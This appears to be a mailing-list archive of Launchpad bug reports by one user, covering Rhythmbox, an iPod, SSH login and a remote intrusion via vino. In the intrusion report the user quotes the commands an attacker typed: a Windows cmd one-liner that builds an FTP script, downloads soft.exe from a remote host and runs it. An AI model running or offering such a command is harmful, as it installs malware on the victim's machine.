[Bug 904390] [NEW] Error Jamendo plugin for rhythmbox loading catalogue

2011-12-14 Thread Jorge Urdaneta
Public bug reported:

Ubuntu 11.10
Rhythmbox 2.90.1

Open Rhythmbox, click jamendo on the left, it says it's loading
catalogue... never ends.

Running with -d noticed method get_url_chunks in file
/usr/lib/rhythmbox/plugins/rb/Loader.py is the problem as it raises a
"not implemented" exception on first line.

See paste http://pastebin.com/fvsHPFYE

[Bug 642441] Re: Podcasts not showing under Podcast menu in iPod Nano

2010-09-28 Thread Jorge Urdaneta
You may think that iPods are simple music files with the genere "Podcast".
Well... bad news
Apple doesn't give access to the Podcast Library to third party apps.
Even inside the device it is impossible to see the podcasts loaded.

[Bug 383981] Re: severe remote vulnerability

2009-06-16 Thread Jorge Urdaneta
I have recovered the commands received. Looks like a bot trying to make the PC
download a virus and run it.
Two ubuntu boxes with vino enabled received the commands. I repeat: its like
someone has remote control of the keyboard and type those commands asuming that
it is a windows box.

%systemroot%\system32\cmd.exe
cmd /c echo open IP 21 >> ik &echo user dsluser telnet >> ik &echo binary >> ik
&echo get soft.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &soft.exe
&exit

[Bug 383981] [NEW] severe remote vulnerability

2009-06-05 Thread Jorge Urdaneta
*** This bug is a security vulnerability ***

Public security bug reported:

A remote bot/hacker from some remote IP sucessufuly entered in my computer and
sended commands for windows. Calling some executable (maybe malicious) cmd
%SystemRoot%\someexecutable.exe and thing like that (some telnets and so on).
It seems that only the keyboard were controlled by the remote attack.
The attack asumes that it is a windows box.

[Bug 262691] Re: can't login with a special character password

2008-08-29 Thread Jorge Urdaneta
** Description changed:

I changed our server password to include some special characters (e.g., ¿).
After that, I can't login to that server from my linux box (openssh-client nor
putty). On other Windows box I can login without problem. I changed again the
password to exclude the special character '¿' and now I can login in the server
without any problem.
Once I'm logged in on the server I can write the '¿' character without beign
mangled nor set blank as I saw in another bug report.

+ Using
+ Ubuntu 8.04.1 _Hardy Heron_ - Release i386 (20080702.1)
